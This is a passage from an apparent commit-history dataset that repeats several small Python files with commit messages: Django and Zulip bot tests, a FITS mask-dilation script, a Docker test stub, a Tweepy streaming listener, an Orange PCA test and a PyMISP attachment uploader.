self.token = Token.objects.get(user=factories.UserFactory())
self.procedure_url = '/api/procedures/'
self.data = {
"title": "Example Title",
"author": "An Author"
}
@initialize_permissions
def test_created_procedure_has_correct_owner(self):
user = factories.UserFactory()
response = self.client.post(
path=self.procedure_url,
data=json.dumps(self.data),
content_type='application/json',
HTTP_AUTHORIZATION=add_token_to_header(user, self.token)
)
assert_equals(response.status_code, status.HTTP_200_OK)
body = json.loads(response.content)
assert_true('owner' in body)
assert_equals(body['owner'], user.id)
|
<commit_before><commit_msg>Add test for ensuring procedures have the correct owner<commit_after>from django.test import TestCase, Client
from rest_framework import status
from rest_framework.authtoken.models import Token
from nose.tools import assert_equals, assert_true
from utils.decorators import initialize_permissions
from utils.helpers import add_token_to_header
from utils import factories
import json
class ProcedureTest(TestCase):
def setUp(self):
self.client = Client()
self.token = Token.objects.get(user=factories.UserFactory())
self.procedure_url = '/api/procedures/'
self.data = {
"title": "Example Title",
"author": "An Author"
}
@initialize_permissions
def test_created_procedure_has_correct_owner(self):
user = factories.UserFactory()
response = self.client.post(
path=self.procedure_url,
data=json.dumps(self.data),
content_type='application/json',
HTTP_AUTHORIZATION=add_token_to_header(user, self.token)
)
assert_equals(response.status_code, status.HTTP_200_OK)
body = json.loads(response.content)
assert_true('owner' in body)
assert_equals(body['owner'], user.id)
|
|
601d0183674b555c231954dbf92955e8d8918d0a
|
contrib_bots/bots/wikipedia/test_wikipedia.py
|
contrib_bots/bots/wikipedia/test_wikipedia.py
|
#!/usr/bin/env python
from __future__ import absolute_import
from __future__ import print_function
import os
import sys
our_dir = os.path.dirname(os.path.abspath(__file__))
# For dev setups, we can find the API in the repo itself.
if os.path.exists(os.path.join(our_dir, '..')):
sys.path.insert(0, '..')
from bots_test_lib import BotTestCase
class TestWikipediaBot(BotTestCase):
bot_name = "wikipedia"
def test_bot(self):
self.assert_bot_output(
{'content': "foo", 'type': "private", 'sender_email': "foo"},
'For search term "foo", https://en.wikipedia.org/wiki/Foobar'
)
self.assert_bot_output(
{'content': "", 'type': "stream", 'display_recipient': "foo", 'subject': "foo"},
'Please enter your message after @mention-bot'
)
self.assert_bot_output(
{'content': "sssssss kkkkk", 'type': "stream", 'display_recipient': "foo", 'subject': "foo"},
'I am sorry. The search term you provided is not found :slightly_frowning_face:'
)
self.assert_bot_output(
{'content': "123", 'type': "stream", 'display_recipient': "foo", 'subject': "foo"},
'For search term "123", https://en.wikipedia.org/wiki/123'
)
|
Add tests for wikipedia bot in contrib_bots.
|
testsuite: Add tests for wikipedia bot in contrib_bots.
Add test file 'Test_wikipedia.py'.
Since wikipedia links for the same query may different according
to relevance. This test will also be written by mocking HTTP
traffic. But this can work for now.
|
Python
|
apache-2.0
|
jackrzhang/zulip,verma-varsha/zulip,brockwhittaker/zulip,rishig/zulip,vaidap/zulip,andersk/zulip,dhcrzf/zulip,zulip/zulip,shubhamdhama/zulip,showell/zulip,jrowan/zulip,Galexrt/zulip,rht/zulip,timabbott/zulip,rht/zulip,rishig/zulip,shubhamdhama/zulip,hackerkid/zulip,vabs22/zulip,zulip/zulip,andersk/zulip,kou/zulip,rishig/zulip,verma-varsha/zulip,jrowan/zulip,Galexrt/zulip,rht/zulip,vaidap/zulip,kou/zulip,Galexrt/zulip,vaidap/zulip,synicalsyntax/zulip,jackrzhang/zulip,brainwane/zulip,synicalsyntax/zulip,punchagan/zulip,vaidap/zulip,zulip/zulip,rishig/zulip,synicalsyntax/zulip,shubhamdhama/zulip,Galexrt/zulip,tommyip/zulip,zulip/zulip,synicalsyntax/zulip,rishig/zulip,tommyip/zulip,verma-varsha/zulip,andersk/zulip,eeshangarg/zulip,kou/zulip,dhcrzf/zulip,brockwhittaker/zulip,amanharitsh123/zulip,jrowan/zulip,andersk/zulip,tommyip/zulip,brainwane/zulip,eeshangarg/zulip,andersk/zulip,vabs22/zulip,brainwane/zulip,andersk/zulip,showell/zulip,jackrzhang/zulip,punchagan/zulip,Galexrt/zulip,jackrzhang/zulip,mahim97/zulip,showell/zulip,dhcrzf/zulip,timabbott/zulip,mahim97/zulip,timabbott/zulip,showell/zulip,kou/zulip,eeshangarg/zulip,timabbott/zulip,timabbott/zulip,shubhamdhama/zulip,kou/zulip,dhcrzf/zulip,eeshangarg/zulip,Galexrt/zulip,vabs22/zulip,amanharitsh123/zulip,rht/zulip,hackerkid/zulip,zulip/zulip,brockwhittaker/zulip,synicalsyntax/zulip,amanharitsh123/zulip,showell/zulip,eeshangarg/zulip,shubhamdhama/zulip,showell/zulip,verma-varsha/zulip,hackerkid/zulip,vaidap/zulip,jrowan/zulip,jackrzhang/zulip,punchagan/zulip,rishig/zulip,kou/zulip,dhcrzf/zulip,jackrzhang/zulip,eeshangarg/zulip,punchagan/zulip,brockwhittaker/zulip,eeshangarg/zulip,jackrzhang/zulip,vabs22/zulip,zulip/zulip,punchagan/zulip,showell/zulip,rht/zulip,vabs22/zulip,tommyip/zulip,hackerkid/zulip,verma-varsha/zulip,synicalsyntax/zulip,amanharitsh123/zulip,kou/zulip,shubhamdhama/zulip,brainwane/zulip,vabs22/zulip,amanharitsh123/zulip,rht/zulip,punchagan/zulip,tommyip/zulip,synicalsyntax/zulip,jrowan/zulip,vaidap/zulip,dhcrzf/zulip,verma-varsha/zulip,timabbott/zulip,brainwane/zulip,shubhamdhama/zulip,jrowan/zulip,brainwane/zulip,rishig/zulip,rht/zulip,tommyip/zulip,hackerkid/zulip,punchagan/zulip,Galexrt/zulip,mahim97/zulip,timabbott/zulip,hackerkid/zulip,brainwane/zulip,brockwhittaker/zulip,brockwhittaker/zulip,amanharitsh123/zulip,dhcrzf/zulip,mahim97/zulip,tommyip/zulip,mahim97/zulip,hackerkid/zulip,zulip/zulip,mahim97/zulip,andersk/zulip
|
testsuite: Add tests for wikipedia bot in contrib_bots.
Add test file 'Test_wikipedia.py'.
Since wikipedia links for the same query may different according
to relevance. This test will also be written by mocking HTTP
traffic. But this can work for now.
|
#!/usr/bin/env python
from __future__ import absolute_import
from __future__ import print_function
import os
import sys
our_dir = os.path.dirname(os.path.abspath(__file__))
# For dev setups, we can find the API in the repo itself.
if os.path.exists(os.path.join(our_dir, '..')):
sys.path.insert(0, '..')
from bots_test_lib import BotTestCase
class TestWikipediaBot(BotTestCase):
bot_name = "wikipedia"
def test_bot(self):
self.assert_bot_output(
{'content': "foo", 'type': "private", 'sender_email': "foo"},
'For search term "foo", https://en.wikipedia.org/wiki/Foobar'
)
self.assert_bot_output(
{'content': "", 'type': "stream", 'display_recipient': "foo", 'subject': "foo"},
'Please enter your message after @mention-bot'
)
self.assert_bot_output(
{'content': "sssssss kkkkk", 'type': "stream", 'display_recipient': "foo", 'subject': "foo"},
'I am sorry. The search term you provided is not found :slightly_frowning_face:'
)
self.assert_bot_output(
{'content': "123", 'type': "stream", 'display_recipient': "foo", 'subject': "foo"},
'For search term "123", https://en.wikipedia.org/wiki/123'
)
|
<commit_before><commit_msg>testsuite: Add tests for wikipedia bot in contrib_bots.
Add test file 'Test_wikipedia.py'.
Since wikipedia links for the same query may different according
to relevance. This test will also be written by mocking HTTP
traffic. But this can work for now.<commit_after>
|
#!/usr/bin/env python
from __future__ import absolute_import
from __future__ import print_function
import os
import sys
our_dir = os.path.dirname(os.path.abspath(__file__))
# For dev setups, we can find the API in the repo itself.
if os.path.exists(os.path.join(our_dir, '..')):
sys.path.insert(0, '..')
from bots_test_lib import BotTestCase
class TestWikipediaBot(BotTestCase):
bot_name = "wikipedia"
def test_bot(self):
self.assert_bot_output(
{'content': "foo", 'type': "private", 'sender_email': "foo"},
'For search term "foo", https://en.wikipedia.org/wiki/Foobar'
)
self.assert_bot_output(
{'content': "", 'type': "stream", 'display_recipient': "foo", 'subject': "foo"},
'Please enter your message after @mention-bot'
)
self.assert_bot_output(
{'content': "sssssss kkkkk", 'type': "stream", 'display_recipient': "foo", 'subject': "foo"},
'I am sorry. The search term you provided is not found :slightly_frowning_face:'
)
self.assert_bot_output(
{'content': "123", 'type': "stream", 'display_recipient': "foo", 'subject': "foo"},
'For search term "123", https://en.wikipedia.org/wiki/123'
)
|
testsuite: Add tests for wikipedia bot in contrib_bots.
Add test file 'Test_wikipedia.py'.
Since wikipedia links for the same query may different according
to relevance. This test will also be written by mocking HTTP
traffic. But this can work for now.#!/usr/bin/env python
from __future__ import absolute_import
from __future__ import print_function
import os
import sys
our_dir = os.path.dirname(os.path.abspath(__file__))
# For dev setups, we can find the API in the repo itself.
if os.path.exists(os.path.join(our_dir, '..')):
sys.path.insert(0, '..')
from bots_test_lib import BotTestCase
class TestWikipediaBot(BotTestCase):
bot_name = "wikipedia"
def test_bot(self):
self.assert_bot_output(
{'content': "foo", 'type': "private", 'sender_email': "foo"},
'For search term "foo", https://en.wikipedia.org/wiki/Foobar'
)
self.assert_bot_output(
{'content': "", 'type': "stream", 'display_recipient': "foo", 'subject': "foo"},
'Please enter your message after @mention-bot'
)
self.assert_bot_output(
{'content': "sssssss kkkkk", 'type': "stream", 'display_recipient': "foo", 'subject': "foo"},
'I am sorry. The search term you provided is not found :slightly_frowning_face:'
)
self.assert_bot_output(
{'content': "123", 'type': "stream", 'display_recipient': "foo", 'subject': "foo"},
'For search term "123", https://en.wikipedia.org/wiki/123'
)
|
<commit_before><commit_msg>testsuite: Add tests for wikipedia bot in contrib_bots.
Add test file 'Test_wikipedia.py'.
Since wikipedia links for the same query may different according
to relevance. This test will also be written by mocking HTTP
traffic. But this can work for now.<commit_after>#!/usr/bin/env python
from __future__ import absolute_import
from __future__ import print_function
import os
import sys
our_dir = os.path.dirname(os.path.abspath(__file__))
# For dev setups, we can find the API in the repo itself.
if os.path.exists(os.path.join(our_dir, '..')):
sys.path.insert(0, '..')
from bots_test_lib import BotTestCase
class TestWikipediaBot(BotTestCase):
bot_name = "wikipedia"
def test_bot(self):
self.assert_bot_output(
{'content': "foo", 'type': "private", 'sender_email': "foo"},
'For search term "foo", https://en.wikipedia.org/wiki/Foobar'
)
self.assert_bot_output(
{'content': "", 'type': "stream", 'display_recipient': "foo", 'subject': "foo"},
'Please enter your message after @mention-bot'
)
self.assert_bot_output(
{'content': "sssssss kkkkk", 'type': "stream", 'display_recipient': "foo", 'subject': "foo"},
'I am sorry. The search term you provided is not found :slightly_frowning_face:'
)
self.assert_bot_output(
{'content': "123", 'type': "stream", 'display_recipient': "foo", 'subject': "foo"},
'For search term "123", https://en.wikipedia.org/wiki/123'
)
|
|
a4a5dd1943b074cf23cd5420ca0a5ac56fadbc38
|
14B-088/HI/alter_clean_mask.py
|
14B-088/HI/alter_clean_mask.py
|
'''
Dilate the existing clean mask.
'''
from astropy.io import fits
from skimage.morphology import disk
from scipy import ndimage as nd
mask = fits.open("M33_14B-088_HI_mask_modified.fits", mode='update')
pbcov = fits.getdata("M33_14B-088_pbcor.fits")
pb_thresh = 0.2
pb_mask = pbcov > pb_thresh
struct = disk(100)
for i in xrange(1231):
print(i)
mask[0].data[i, 0, :, :] = \
nd.binary_dilation(mask[0].data[i, 0, :, :], structure=struct)
mask[0].data[i, 0, :, :] *= pb_mask.squeeze()
mask.flush()
mask.close()
|
Mask dilation to include missing flux near some edges
|
Mask dilation to include missing flux near some edges
|
Python
|
mit
|
e-koch/VLA_Lband,e-koch/VLA_Lband
|
Mask dilation to include missing flux near some edges
|
'''
Dilate the existing clean mask.
'''
from astropy.io import fits
from skimage.morphology import disk
from scipy import ndimage as nd
mask = fits.open("M33_14B-088_HI_mask_modified.fits", mode='update')
pbcov = fits.getdata("M33_14B-088_pbcor.fits")
pb_thresh = 0.2
pb_mask = pbcov > pb_thresh
struct = disk(100)
for i in xrange(1231):
print(i)
mask[0].data[i, 0, :, :] = \
nd.binary_dilation(mask[0].data[i, 0, :, :], structure=struct)
mask[0].data[i, 0, :, :] *= pb_mask.squeeze()
mask.flush()
mask.close()
|
<commit_before><commit_msg>Mask dilation to include missing flux near some edges<commit_after>
|
'''
Dilate the existing clean mask.
'''
from astropy.io import fits
from skimage.morphology import disk
from scipy import ndimage as nd
mask = fits.open("M33_14B-088_HI_mask_modified.fits", mode='update')
pbcov = fits.getdata("M33_14B-088_pbcor.fits")
pb_thresh = 0.2
pb_mask = pbcov > pb_thresh
struct = disk(100)
for i in xrange(1231):
print(i)
mask[0].data[i, 0, :, :] = \
nd.binary_dilation(mask[0].data[i, 0, :, :], structure=struct)
mask[0].data[i, 0, :, :] *= pb_mask.squeeze()
mask.flush()
mask.close()
|
Mask dilation to include missing flux near some edges
'''
Dilate the existing clean mask.
'''
from astropy.io import fits
from skimage.morphology import disk
from scipy import ndimage as nd
mask = fits.open("M33_14B-088_HI_mask_modified.fits", mode='update')
pbcov = fits.getdata("M33_14B-088_pbcor.fits")
pb_thresh = 0.2
pb_mask = pbcov > pb_thresh
struct = disk(100)
for i in xrange(1231):
print(i)
mask[0].data[i, 0, :, :] = \
nd.binary_dilation(mask[0].data[i, 0, :, :], structure=struct)
mask[0].data[i, 0, :, :] *= pb_mask.squeeze()
mask.flush()
mask.close()
|
<commit_before><commit_msg>Mask dilation to include missing flux near some edges<commit_after>
'''
Dilate the existing clean mask.
'''
from astropy.io import fits
from skimage.morphology import disk
from scipy import ndimage as nd
mask = fits.open("M33_14B-088_HI_mask_modified.fits", mode='update')
pbcov = fits.getdata("M33_14B-088_pbcor.fits")
pb_thresh = 0.2
pb_mask = pbcov > pb_thresh
struct = disk(100)
for i in xrange(1231):
print(i)
mask[0].data[i, 0, :, :] = \
nd.binary_dilation(mask[0].data[i, 0, :, :], structure=struct)
mask[0].data[i, 0, :, :] *= pb_mask.squeeze()
mask.flush()
mask.close()
|
|
67ecc5e673b516de7d438f9294eac43203f6461f
|
sip/execution_control/docker_api/docker_client/tests/test_pcube.py
|
sip/execution_control/docker_api/docker_client/tests/test_pcube.py
|
# -*- coding: utf-8 -*-
"""Test for docker client API on P3."""
import logging
import os
from ..docker_client import DockerClient
logging.basicConfig(level=os.getenv('SIP_DOCKER_API_LOG_LEVEL', 'DEBUG'))
DC = DockerClient()
FILE_PATH = os.path.dirname(__file__)
def test_log_driver():
"""Test function to check if log driver is loaded correctly from
compose file.
"""
config_path = os.path.join(FILE_PATH, '..', 'compose-file',
'docker-compose.p3-fluentd.yml')
running_service_ids = []
test_ids = []
with open(config_path, 'r') as compose_str:
s_ids = DC.create_services(compose_str)
# TODO (NJT) nEED TO COMPLETE THIS UNIT TEST
# GET SERVICE DETAILS AND GET THE LOG DRIVE AND LOG OPTIONS FROM IT
# for s_id in s_ids:
# running_service_ids.append(s_id)
# test_ids.append(s_id)
|
Test script for docker swarm api on p3
|
Test script for docker swarm api on p3
|
Python
|
bsd-3-clause
|
SKA-ScienceDataProcessor/integration-prototype,SKA-ScienceDataProcessor/integration-prototype,SKA-ScienceDataProcessor/integration-prototype,SKA-ScienceDataProcessor/integration-prototype
|
Test script for docker swarm api on p3
|
# -*- coding: utf-8 -*-
"""Test for docker client API on P3."""
import logging
import os
from ..docker_client import DockerClient
logging.basicConfig(level=os.getenv('SIP_DOCKER_API_LOG_LEVEL', 'DEBUG'))
DC = DockerClient()
FILE_PATH = os.path.dirname(__file__)
def test_log_driver():
"""Test function to check if log driver is loaded correctly from
compose file.
"""
config_path = os.path.join(FILE_PATH, '..', 'compose-file',
'docker-compose.p3-fluentd.yml')
running_service_ids = []
test_ids = []
with open(config_path, 'r') as compose_str:
s_ids = DC.create_services(compose_str)
# TODO (NJT) nEED TO COMPLETE THIS UNIT TEST
# GET SERVICE DETAILS AND GET THE LOG DRIVE AND LOG OPTIONS FROM IT
# for s_id in s_ids:
# running_service_ids.append(s_id)
# test_ids.append(s_id)
|
<commit_before><commit_msg>Test script for docker swarm api on p3<commit_after>
|
# -*- coding: utf-8 -*-
"""Test for docker client API on P3."""
import logging
import os
from ..docker_client import DockerClient
logging.basicConfig(level=os.getenv('SIP_DOCKER_API_LOG_LEVEL', 'DEBUG'))
DC = DockerClient()
FILE_PATH = os.path.dirname(__file__)
def test_log_driver():
"""Test function to check if log driver is loaded correctly from
compose file.
"""
config_path = os.path.join(FILE_PATH, '..', 'compose-file',
'docker-compose.p3-fluentd.yml')
running_service_ids = []
test_ids = []
with open(config_path, 'r') as compose_str:
s_ids = DC.create_services(compose_str)
# TODO (NJT) nEED TO COMPLETE THIS UNIT TEST
# GET SERVICE DETAILS AND GET THE LOG DRIVE AND LOG OPTIONS FROM IT
# for s_id in s_ids:
# running_service_ids.append(s_id)
# test_ids.append(s_id)
|
Test script for docker swarm api on p3# -*- coding: utf-8 -*-
"""Test for docker client API on P3."""
import logging
import os
from ..docker_client import DockerClient
logging.basicConfig(level=os.getenv('SIP_DOCKER_API_LOG_LEVEL', 'DEBUG'))
DC = DockerClient()
FILE_PATH = os.path.dirname(__file__)
def test_log_driver():
"""Test function to check if log driver is loaded correctly from
compose file.
"""
config_path = os.path.join(FILE_PATH, '..', 'compose-file',
'docker-compose.p3-fluentd.yml')
running_service_ids = []
test_ids = []
with open(config_path, 'r') as compose_str:
s_ids = DC.create_services(compose_str)
# TODO (NJT) nEED TO COMPLETE THIS UNIT TEST
# GET SERVICE DETAILS AND GET THE LOG DRIVE AND LOG OPTIONS FROM IT
# for s_id in s_ids:
# running_service_ids.append(s_id)
# test_ids.append(s_id)
|
<commit_before><commit_msg>Test script for docker swarm api on p3<commit_after># -*- coding: utf-8 -*-
"""Test for docker client API on P3."""
import logging
import os
from ..docker_client import DockerClient
logging.basicConfig(level=os.getenv('SIP_DOCKER_API_LOG_LEVEL', 'DEBUG'))
DC = DockerClient()
FILE_PATH = os.path.dirname(__file__)
def test_log_driver():
"""Test function to check if log driver is loaded correctly from
compose file.
"""
config_path = os.path.join(FILE_PATH, '..', 'compose-file',
'docker-compose.p3-fluentd.yml')
running_service_ids = []
test_ids = []
with open(config_path, 'r') as compose_str:
s_ids = DC.create_services(compose_str)
# TODO (NJT) nEED TO COMPLETE THIS UNIT TEST
# GET SERVICE DETAILS AND GET THE LOG DRIVE AND LOG OPTIONS FROM IT
# for s_id in s_ids:
# running_service_ids.append(s_id)
# test_ids.append(s_id)
|
|
2bf6679ae64c274f1a228a16fa365daa9bb19ae3
|
twitter_streaming.py
|
twitter_streaming.py
|
# This uses Tweepy, a Python library for accessing the Twitter API:
# http://www.tweepy.org. Install with `pip install tweepy`.
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
from tweepy import Stream
with open('twitter_api_key.txt') as fileHandle:
(access_token, access_token_secret, consumer_key, consumer_secret) = \
[item.strip('\n') for item in fileHandle.readlines()]
print access_token
print access_token_secret
print consumer_key
print consumer_secret
keywords = ['python', 'javascript', 'ruby']
# This is a basic listener that prints received tweets to stdout
class StdOutListener(StreamListener):
def on_data(self, data):
print data
return True
def on_error(self, status):
print status
if __name__ == "__main__":
# Handle Twitter authentication and connection to Twitter Streaming API
listener = StdOutListener()
auth = OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
stream = Stream(auth, listener)
# Filter Twitter stream according to keywords
stream.filter(track = keywords)
|
Add main Twitter stream capture script
|
Add main Twitter stream capture script
|
Python
|
mit
|
0x7df/twitter2pocket
|
Add main Twitter stream capture script
|
# This uses Tweepy, a Python library for accessing the Twitter API:
# http://www.tweepy.org. Install with `pip install tweepy`.
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
from tweepy import Stream
with open('twitter_api_key.txt') as fileHandle:
(access_token, access_token_secret, consumer_key, consumer_secret) = \
[item.strip('\n') for item in fileHandle.readlines()]
print access_token
print access_token_secret
print consumer_key
print consumer_secret
keywords = ['python', 'javascript', 'ruby']
# This is a basic listener that prints received tweets to stdout
class StdOutListener(StreamListener):
def on_data(self, data):
print data
return True
def on_error(self, status):
print status
if __name__ == "__main__":
# Handle Twitter authentication and connection to Twitter Streaming API
listener = StdOutListener()
auth = OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
stream = Stream(auth, listener)
# Filter Twitter stream according to keywords
stream.filter(track = keywords)
|
<commit_before><commit_msg>Add main Twitter stream capture script<commit_after>
|
# This uses Tweepy, a Python library for accessing the Twitter API:
# http://www.tweepy.org. Install with `pip install tweepy`.
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
from tweepy import Stream
with open('twitter_api_key.txt') as fileHandle:
(access_token, access_token_secret, consumer_key, consumer_secret) = \
[item.strip('\n') for item in fileHandle.readlines()]
print access_token
print access_token_secret
print consumer_key
print consumer_secret
keywords = ['python', 'javascript', 'ruby']
# This is a basic listener that prints received tweets to stdout
class StdOutListener(StreamListener):
def on_data(self, data):
print data
return True
def on_error(self, status):
print status
if __name__ == "__main__":
# Handle Twitter authentication and connection to Twitter Streaming API
listener = StdOutListener()
auth = OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
stream = Stream(auth, listener)
# Filter Twitter stream according to keywords
stream.filter(track = keywords)
|
Add main Twitter stream capture script# This uses Tweepy, a Python library for accessing the Twitter API:
# http://www.tweepy.org. Install with `pip install tweepy`.
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
from tweepy import Stream
with open('twitter_api_key.txt') as fileHandle:
(access_token, access_token_secret, consumer_key, consumer_secret) = \
[item.strip('\n') for item in fileHandle.readlines()]
print access_token
print access_token_secret
print consumer_key
print consumer_secret
keywords = ['python', 'javascript', 'ruby']
# This is a basic listener that prints received tweets to stdout
class StdOutListener(StreamListener):
def on_data(self, data):
print data
return True
def on_error(self, status):
print status
if __name__ == "__main__":
# Handle Twitter authentication and connection to Twitter Streaming API
listener = StdOutListener()
auth = OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
stream = Stream(auth, listener)
# Filter Twitter stream according to keywords
stream.filter(track = keywords)
|
<commit_before><commit_msg>Add main Twitter stream capture script<commit_after># This uses Tweepy, a Python library for accessing the Twitter API:
# http://www.tweepy.org. Install with `pip install tweepy`.
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
from tweepy import Stream
with open('twitter_api_key.txt') as fileHandle:
(access_token, access_token_secret, consumer_key, consumer_secret) = \
[item.strip('\n') for item in fileHandle.readlines()]
print access_token
print access_token_secret
print consumer_key
print consumer_secret
keywords = ['python', 'javascript', 'ruby']
# This is a basic listener that prints received tweets to stdout
class StdOutListener(StreamListener):
def on_data(self, data):
print data
return True
def on_error(self, status):
print status
if __name__ == "__main__":
# Handle Twitter authentication and connection to Twitter Streaming API
listener = StdOutListener()
auth = OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
stream = Stream(auth, listener)
# Filter Twitter stream according to keywords
stream.filter(track = keywords)
|
|
d3dce2e89c41abb35aac5b54c0ef03481b843e89
|
Orange/tests/sql/test_pca.py
|
Orange/tests/sql/test_pca.py
|
import unittest
from unittest.mock import patch, MagicMock
from Orange.data import DiscreteVariable, Domain
from Orange.data.sql.table import SqlTable
from Orange.projection.pca import RemotePCA
from Orange.tests.sql.base import sql_test, connection_params
@sql_test
class PCATest(unittest.TestCase):
@patch("Orange.projection.pca.save_state", MagicMock())
def test_PCA(self):
table = SqlTable(connection_params(), 'iris',
type_hints=Domain([], DiscreteVariable("iris",
values=['Iris-setosa', 'Iris-virginica',
'Iris-versicolor'])))
for batch_size in (50, 500):
rpca = RemotePCA(table, batch_size, 10)
self.assertEqual(rpca.components_.shape, (4, 4))
if __name__ == '__main__':
unittest.main()
|
Add test for RemotePCA (run locally)
|
Add test for RemotePCA (run locally)
|
Python
|
bsd-2-clause
|
qPCR4vir/orange3,kwikadi/orange3,marinkaz/orange3,qPCR4vir/orange3,cheral/orange3,marinkaz/orange3,marinkaz/orange3,qPCR4vir/orange3,marinkaz/orange3,kwikadi/orange3,kwikadi/orange3,kwikadi/orange3,kwikadi/orange3,marinkaz/orange3,cheral/orange3,qPCR4vir/orange3,qPCR4vir/orange3,cheral/orange3,cheral/orange3,marinkaz/orange3,qPCR4vir/orange3,kwikadi/orange3,cheral/orange3,cheral/orange3
|
Add test for RemotePCA (run locally)
|
import unittest
from unittest.mock import patch, MagicMock
from Orange.data import DiscreteVariable, Domain
from Orange.data.sql.table import SqlTable
from Orange.projection.pca import RemotePCA
from Orange.tests.sql.base import sql_test, connection_params
@sql_test
class PCATest(unittest.TestCase):
@patch("Orange.projection.pca.save_state", MagicMock())
def test_PCA(self):
table = SqlTable(connection_params(), 'iris',
type_hints=Domain([], DiscreteVariable("iris",
values=['Iris-setosa', 'Iris-virginica',
'Iris-versicolor'])))
for batch_size in (50, 500):
rpca = RemotePCA(table, batch_size, 10)
self.assertEqual(rpca.components_.shape, (4, 4))
if __name__ == '__main__':
unittest.main()
|
<commit_before><commit_msg>Add test for RemotePCA (run locally)<commit_after>
|
import unittest
from unittest.mock import patch, MagicMock
from Orange.data import DiscreteVariable, Domain
from Orange.data.sql.table import SqlTable
from Orange.projection.pca import RemotePCA
from Orange.tests.sql.base import sql_test, connection_params
@sql_test
class PCATest(unittest.TestCase):
@patch("Orange.projection.pca.save_state", MagicMock())
def test_PCA(self):
table = SqlTable(connection_params(), 'iris',
type_hints=Domain([], DiscreteVariable("iris",
values=['Iris-setosa', 'Iris-virginica',
'Iris-versicolor'])))
for batch_size in (50, 500):
rpca = RemotePCA(table, batch_size, 10)
self.assertEqual(rpca.components_.shape, (4, 4))
if __name__ == '__main__':
unittest.main()
|
Add test for RemotePCA (run locally)import unittest
from unittest.mock import patch, MagicMock
from Orange.data import DiscreteVariable, Domain
from Orange.data.sql.table import SqlTable
from Orange.projection.pca import RemotePCA
from Orange.tests.sql.base import sql_test, connection_params
@sql_test
class PCATest(unittest.TestCase):
@patch("Orange.projection.pca.save_state", MagicMock())
def test_PCA(self):
table = SqlTable(connection_params(), 'iris',
type_hints=Domain([], DiscreteVariable("iris",
values=['Iris-setosa', 'Iris-virginica',
'Iris-versicolor'])))
for batch_size in (50, 500):
rpca = RemotePCA(table, batch_size, 10)
self.assertEqual(rpca.components_.shape, (4, 4))
if __name__ == '__main__':
unittest.main()
|
<commit_before><commit_msg>Add test for RemotePCA (run locally)<commit_after>import unittest
from unittest.mock import patch, MagicMock
from Orange.data import DiscreteVariable, Domain
from Orange.data.sql.table import SqlTable
from Orange.projection.pca import RemotePCA
from Orange.tests.sql.base import sql_test, connection_params
@sql_test
class PCATest(unittest.TestCase):
@patch("Orange.projection.pca.save_state", MagicMock())
def test_PCA(self):
table = SqlTable(connection_params(), 'iris',
type_hints=Domain([], DiscreteVariable("iris",
values=['Iris-setosa', 'Iris-virginica',
'Iris-versicolor'])))
for batch_size in (50, 500):
rpca = RemotePCA(table, batch_size, 10)
self.assertEqual(rpca.components_.shape, (4, 4))
if __name__ == '__main__':
unittest.main()
|
|
58bfd30a23d68540abd92d4d8c3a32d2636108a4
|
examples/add_attachement.py
|
examples/add_attachement.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pymisp import PyMISP
from keys import priv
import argparse
import os
import glob
import base64
import json
import time
url = 'https://misppriv.circl.lu'
def init(url, key):
return PyMISP(url, key, True, 'json')
def upload_file(m, eid, path):
curevent = misp.get_event(eid)
j = curevent.json()
if j.get("Event"):
with open(path, "rb") as curfile:
j["Event"].update({"data": base64.b64encode(curfile.read())})
j["Event"]["timestamp"] = int(time.time())
out = misp.update_event(args.event, json.dumps(j))
print out, out.text
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Send malware sample to MISP.')
parser.add_argument("-u", "--upload", type=str, required=True, help="File or directory of files to upload.")
parser.add_argument("-e", "--event", type=int, help="Event to update with a sample (if none, create a new event).")
args = parser.parse_args()
misp = init(url, priv)
if os.path.isfile(args.upload):
upload_file(misp, args.event, args.upload)
elif os.path.isdir(args.upload):
for filename in glob.iglob(os.path.join(args.upload + '*')):
upload_file(misp, args.event, filename)
|
Add test script to add attachement to event
|
Add test script to add attachement to event
|
Python
|
bsd-2-clause
|
grolinet/PyMISP,pombredanne/PyMISP,iglocska/PyMISP
|
Add test script to add attachement to event
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pymisp import PyMISP
from keys import priv
import argparse
import os
import glob
import base64
import json
import time
url = 'https://misppriv.circl.lu'
def init(url, key):
return PyMISP(url, key, True, 'json')
def upload_file(m, eid, path):
curevent = misp.get_event(eid)
j = curevent.json()
if j.get("Event"):
with open(path, "rb") as curfile:
j["Event"].update({"data": base64.b64encode(curfile.read())})
j["Event"]["timestamp"] = int(time.time())
out = misp.update_event(args.event, json.dumps(j))
print out, out.text
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Send malware sample to MISP.')
parser.add_argument("-u", "--upload", type=str, required=True, help="File or directory of files to upload.")
parser.add_argument("-e", "--event", type=int, help="Event to update with a sample (if none, create a new event).")
args = parser.parse_args()
misp = init(url, priv)
if os.path.isfile(args.upload):
upload_file(misp, args.event, args.upload)
elif os.path.isdir(args.upload):
for filename in glob.iglob(os.path.join(args.upload + '*')):
upload_file(misp, args.event, filename)
|
<commit_before><commit_msg>Add test script to add attachement to event<commit_after>
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pymisp import PyMISP
from keys import priv
import argparse
import os
import glob
import base64
import json
import time
url = 'https://misppriv.circl.lu'
def init(url, key):
return PyMISP(url, key, True, 'json')
def upload_file(m, eid, path):
curevent = misp.get_event(eid)
j = curevent.json()
if j.get("Event"):
with open(path, "rb") as curfile:
j["Event"].update({"data": base64.b64encode(curfile.read())})
j["Event"]["timestamp"] = int(time.time())
out = misp.update_event(args.event, json.dumps(j))
print out, out.text
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Send malware sample to MISP.')
parser.add_argument("-u", "--upload", type=str, required=True, help="File or directory of files to upload.")
parser.add_argument("-e", "--event", type=int, help="Event to update with a sample (if none, create a new event).")
